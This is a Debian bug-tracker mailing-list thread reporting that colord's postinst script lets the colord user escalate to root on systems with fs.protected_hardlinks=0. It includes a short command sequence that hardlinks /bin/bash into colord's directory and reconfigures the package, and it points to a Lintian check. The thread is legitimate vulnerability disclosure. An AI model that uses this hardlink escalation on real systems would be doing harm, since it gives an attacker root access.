subject:"Bug#889060\: colord.postinst\: colord \-> root escalation on systems with fs.protected

Bug#889060: colord.postinst: colord -> root escalation on systems with fs.protected_hardlinks=0

2018-02-02 Thread Chris Lamb

Hi Ansgar,

> now hoping every other `chmod -R` call gets a CVE assigned

See #889066 for a Lintian check for this.


Regards,

-- 
  ,''`.
 : :'  : Chris Lamb
 `. `'`  la...@debian.org / chris-lamb.co.uk
   `-

Bug#889060: colord.postinst: colord -> root escalation on systems with fs.protected_hardlinks=0

2018-02-01 Thread Ansgar Burchardt

Package: colord
Version: 1.3.3-2
Severity: important
Tags: security

On systems with fs.protected_hardlinks=0 the postinst script allows
escalation from the colord user to root:

+---
| # sysctl fs.protected_hardlinks=0
| # runuser -u colord ln /bin/bash /var/lib/colord/bash
| # ls -l /bin/bash
| -rwxr-xr-x 2 root root 1099016 May 15  2017 /bin/bash
| # dpkg-reconfigure colord
| # ls -l /bin/bash
| -rwxr-xr-x 2 colord colord 1099016 May 15  2017 /bin/bash
+---

This is essentially the same problem as CVE-2017-18078.

Ansgar
  (now hoping every other `chmod -R` call gets a CVE assigned)

Bug#889060: colord.postinst: colord -> root escalation on systems with fs.protected_hardlinks=0

Bug#889060: colord.postinst: colord -> root escalation on systems with fs.protected_hardlinks=0

2 matches

Site Navigation

Mail list logo

Footer information